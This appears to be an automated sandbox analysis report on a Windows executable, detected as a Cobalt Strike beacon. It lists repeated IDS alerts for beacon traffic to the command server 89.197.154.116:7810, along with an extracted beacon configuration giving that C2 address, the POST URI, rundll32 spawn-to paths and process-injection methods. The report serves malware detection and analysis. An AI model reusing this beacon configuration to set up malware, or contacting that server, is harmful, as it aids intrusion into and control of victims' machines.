            2024-10-07T22:01:25.987531+020020366771A Network Trojan was detected192.168.2.44993189.197.154.1167810TCP
            2024-10-07T22:01:30.231283+020020366771A Network Trojan was detected192.168.2.44993989.197.154.1167810TCP
            2024-10-07T22:01:31.987185+020020366771A Network Trojan was detected192.168.2.44996489.197.154.1167810TCP
            2024-10-07T22:01:33.703695+020020366771A Network Trojan was detected192.168.2.44997489.197.154.1167810TCP
            2024-10-07T22:01:35.440140+020020366771A Network Trojan was detected192.168.2.44998589.197.154.1167810TCP
            2024-10-07T22:01:37.248186+020020366771A Network Trojan was detected192.168.2.44999989.197.154.1167810TCP
            2024-10-07T22:01:38.959548+020020366771A Network Trojan was detected192.168.2.45001089.197.154.1167810TCP
            2024-10-07T22:01:40.674934+020020366771A Network Trojan was detected192.168.2.45002289.197.154.1167810TCP
            2024-10-07T22:01:42.555618+020020366771A Network Trojan was detected192.168.2.45003189.197.154.1167810TCP
            2024-10-07T22:01:44.253610+020020366771A Network Trojan was detected192.168.2.45003689.197.154.1167810TCP
            2024-10-07T22:01:45.937035+020020366771A Network Trojan was detected192.168.2.45004789.197.154.1167810TCP
            2024-10-07T22:01:47.705942+020020366771A Network Trojan was detected192.168.2.45005689.197.154.1167810TCP
            2024-10-07T22:01:49.411092+020020366771A Network Trojan was detected192.168.2.45006189.197.154.1167810TCP
            2024-10-07T22:01:51.121962+020020366771A Network Trojan was detected192.168.2.45006289.197.154.1167810TCP
            2024-10-07T22:01:52.812386+020020366771A Network Trojan was detected192.168.2.45006389.197.154.1167810TCP
            2024-10-07T22:01:54.523649+020020366771A Network Trojan was detected192.168.2.45006489.197.154.1167810TCP
            2024-10-07T22:01:56.234251+020020366771A Network Trojan was detected192.168.2.45006589.197.154.1167810TCP
            2024-10-07T22:01:57.943671+020020366771A Network Trojan was detected192.168.2.45006689.197.154.1167810TCP
            2024-10-07T22:01:59.659436+020020366771A Network Trojan was detected192.168.2.45006789.197.154.1167810TCP
            2024-10-07T22:02:00.965734+020020366771A Network Trojan was detected192.168.2.45006889.197.154.1167810TCP
            2024-10-07T22:02:02.745780+020020366771A Network Trojan was detected192.168.2.45006989.197.154.1167810TCP
            2024-10-07T22:02:04.531226+020020366771A Network Trojan was detected192.168.2.45007089.197.154.1167810TCP
            2024-10-07T22:02:06.279916+020020366771A Network Trojan was detected192.168.2.45007189.197.154.1167810TCP
            2024-10-07T22:02:07.987670+020020366771A Network Trojan was detected192.168.2.45007289.197.154.1167810TCP
            2024-10-07T22:02:09.688424+020020366771A Network Trojan was detected192.168.2.45007389.197.154.1167810TCP
            2024-10-07T22:02:11.375813+020020366771A Network Trojan was detected192.168.2.45007489.197.154.1167810TCP
            2024-10-07T22:02:13.110536+020020366771A Network Trojan was detected192.168.2.45007589.197.154.1167810TCP
            2024-10-07T22:02:14.797259+020020366771A Network Trojan was detected192.168.2.45007689.197.154.1167810TCP
            2024-10-07T22:02:18.921867+020020366771A Network Trojan was detected192.168.2.45007789.197.154.1167810TCP
            2024-10-07T22:02:20.671891+020020366771A Network Trojan was detected192.168.2.45007889.197.154.1167810TCP
            2024-10-07T22:02:22.359658+020020366771A Network Trojan was detected192.168.2.45007989.197.154.1167810TCP
            2024-10-07T22:02:24.047079+020020366771A Network Trojan was detected192.168.2.45008089.197.154.1167810TCP
            2024-10-07T22:02:25.775690+020020366771A Network Trojan was detected192.168.2.45008189.197.154.1167810TCP
            2024-10-07T22:02:27.509125+020020366771A Network Trojan was detected192.168.2.45008289.197.154.1167810TCP
            2024-10-07T22:02:29.296493+020020366771A Network Trojan was detected192.168.2.45008389.197.154.1167810TCP
            2024-10-07T22:02:30.987183+020020366771A Network Trojan was detected192.168.2.45008489.197.154.1167810TCP
            2024-10-07T22:02:32.843335+020020366771A Network Trojan was detected192.168.2.45008589.197.154.1167810TCP
            2024-10-07T22:02:34.579818+020020366771A Network Trojan was detected192.168.2.45008689.197.154.1167810TCP
            2024-10-07T22:02:36.284525+020020366771A Network Trojan was detected192.168.2.45008789.197.154.1167810TCP
            2024-10-07T22:02:37.991762+020020366771A Network Trojan was detected192.168.2.45008889.197.154.1167810TCP
            2024-10-07T22:02:39.922933+020020366771A Network Trojan was detected192.168.2.45008989.197.154.1167810TCP
            2024-10-07T22:02:41.609244+020020366771A Network Trojan was detected192.168.2.45009089.197.154.1167810TCP
            2024-10-07T22:02:43.394927+020020366771A Network Trojan was detected192.168.2.45009189.197.154.1167810TCP
            2024-10-07T22:02:45.110616+020020366771A Network Trojan was detected192.168.2.45009289.197.154.1167810TCP
            2024-10-07T22:02:46.838712+020020366771A Network Trojan was detected192.168.2.45009389.197.154.1167810TCP
            2024-10-07T22:02:48.670293+020020366771A Network Trojan was detected192.168.2.45009489.197.154.1167810TCP
            2024-10-07T22:02:50.382420+020020366771A Network Trojan was detected192.168.2.45009589.197.154.1167810TCP
            2024-10-07T22:02:52.127731+020020366771A Network Trojan was detected192.168.2.45009689.197.154.1167810TCP
            2024-10-07T22:02:53.847880+020020366771A Network Trojan was detected192.168.2.45009789.197.154.1167810TCP
            2024-10-07T22:02:55.531342+020020366771A Network Trojan was detected192.168.2.45009889.197.154.1167810TCP
            2024-10-07T22:02:57.239729+020020366771A Network Trojan was detected192.168.2.45009989.197.154.1167810TCP
            2024-10-07T22:02:59.271603+020020366771A Network Trojan was detected192.168.2.45010089.197.154.1167810TCP
            2024-10-07T22:03:01.004317+020020366771A Network Trojan was detected192.168.2.45010189.197.154.1167810TCP
            2024-10-07T22:03:03.244781+020020366771A Network Trojan was detected192.168.2.45010289.197.154.1167810TCP
            2024-10-07T22:03:04.960032+020020366771A Network Trojan was detected192.168.2.45010389.197.154.1167810TCP
            2024-10-07T22:03:06.689840+020020366771A Network Trojan was detected192.168.2.45010489.197.154.1167810TCP
            2024-10-07T22:03:08.399776+020020366771A Network Trojan was detected192.168.2.45010589.197.154.1167810TCP
            2024-10-07T22:03:11.048493+020020366771A Network Trojan was detected192.168.2.45010689.197.154.1167810TCP
            2024-10-07T22:03:12.779771+020020366771A Network Trojan was detected192.168.2.45010789.197.154.1167810TCP
            2024-10-07T22:03:14.471824+020020366771A Network Trojan was detected192.168.2.45010889.197.154.1167810TCP
            2024-10-07T22:03:16.195755+020020366771A Network Trojan was detected192.168.2.45010989.197.154.1167810TCP
            2024-10-07T22:03:20.324957+020020366771A Network Trojan was detected192.168.2.45011089.197.154.1167810TCP
            2024-10-07T22:03:22.036589+020020366771A Network Trojan was detected192.168.2.45011189.197.154.1167810TCP
            2024-10-07T22:03:23.736122+020020366771A Network Trojan was detected192.168.2.45011289.197.154.1167810TCP
            2024-10-07T22:03:25.438851+020020366771A Network Trojan was detected192.168.2.45011389.197.154.1167810TCP
            2024-10-07T22:03:27.125403+020020366771A Network Trojan was detected192.168.2.45011489.197.154.1167810TCP
            2024-10-07T22:03:31.246894+020020366771A Network Trojan was detected192.168.2.45011589.197.154.1167810TCP
            2024-10-07T22:03:32.940347+020020366771A Network Trojan was detected192.168.2.45011689.197.154.1167810TCP
            2024-10-07T22:03:34.924692+020020366771A Network Trojan was detected192.168.2.45011789.197.154.1167810TCP
            2024-10-07T22:03:36.647798+020020366771A Network Trojan was detected192.168.2.45011889.197.154.1167810TCP
            2024-10-07T22:03:38.367772+020020366771A Network Trojan was detected192.168.2.45011989.197.154.1167810TCP
            2024-10-07T22:03:40.067334+020020366771A Network Trojan was detected192.168.2.45012089.197.154.1167810TCP
            2024-10-07T22:03:41.793351+020020366771A Network Trojan was detected192.168.2.45012189.197.154.1167810TCP
            2024-10-07T22:03:43.493833+020020366771A Network Trojan was detected192.168.2.45012289.197.154.1167810TCP
            2024-10-07T22:03:45.472141+020020366771A Network Trojan was detected192.168.2.45012389.197.154.1167810TCP
            2024-10-07T22:03:47.489094+020020366771A Network Trojan was detected192.168.2.45012489.197.154.1167810TCP
            2024-10-07T22:03:49.298704+020020366771A Network Trojan was detected192.168.2.45012589.197.154.1167810TCP
            2024-10-07T22:03:51.006116+020020366771A Network Trojan was detected192.168.2.45012689.197.154.1167810TCP
            2024-10-07T22:03:52.816640+020020366771A Network Trojan was detected192.168.2.45012789.197.154.1167810TCP
            2024-10-07T22:03:54.507410+020020366771A Network Trojan was detected192.168.2.45012889.197.154.1167810TCP
            2024-10-07T22:03:56.419858+020020366771A Network Trojan was detected192.168.2.45012989.197.154.1167810TCP
            2024-10-07T22:03:58.135993+020020366771A Network Trojan was detected192.168.2.45013089.197.154.1167810TCP
            2024-10-07T22:03:59.879302+020020366771A Network Trojan was detected192.168.2.45013189.197.154.1167810TCP
            2024-10-07T22:04:01.843457+020020366771A Network Trojan was detected192.168.2.45013289.197.154.1167810TCP
            2024-10-07T22:04:03.584335+020020366771A Network Trojan was detected192.168.2.45013389.197.154.1167810TCP
            2024-10-07T22:04:07.715970+020020366771A Network Trojan was detected192.168.2.45013489.197.154.1167810TCP
            2024-10-07T22:04:10.473796+020020366771A Network Trojan was detected192.168.2.45013589.197.154.1167810TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: P3KxDOMmD3.exeAvira: detected
            Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTP"], "Port": 7810, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "89.197.154.116,/cm", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
            Source: P3KxDOMmD3.exeReversingLabs: Detection: 86%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: P3KxDOMmD3.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00661184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_00661184
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00692020 CryptGenRandom,0_2_00692020

            Compliance

            barindex
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeUnpacked PE file: 0.2.P3KxDOMmD3.exe.660000.2.unpack
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00679220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_00679220
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00671C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_00671C30
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 4x nop then sub rsp, 28h0_2_00402314

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49741 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49741 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49736 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49732 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49736 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49757 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49757 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49748 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49734 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49732 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49748 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49751 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49758 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49734 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49758 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49738 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49751 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49765 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49762 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49738 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49765 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49745 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49731 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49762 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49745 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49731 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49755 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49755 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49747 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49747 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49756 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49750 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49754 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49750 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49754 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49769 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49769 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49825 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49749 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49825 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49749 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49807 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49737 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49756 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49737 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49761 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49761 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49764 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49752 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49764 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49780 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49767 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49840 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49780 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49753 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49753 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49760 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49760 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49840 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49791 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49791 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49752 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49759 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49759 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49730 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49857 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49767 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49730 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49733 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49733 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49894 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49894 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49735 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49735 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49807 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49857 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49931 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49879 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49931 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49879 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49851 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49851 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49939 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49939 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49868 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49868 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49974 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49974 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49985 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49985 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49818 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49818 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49964 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49964 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50010 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49763 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49763 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50010 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50056 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50056 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50036 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50036 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50068 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50069 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50070 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50070 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50073 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50073 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50086 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50069 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50063 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50080 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50072 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50080 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50072 -> 89.197.154.116:7810
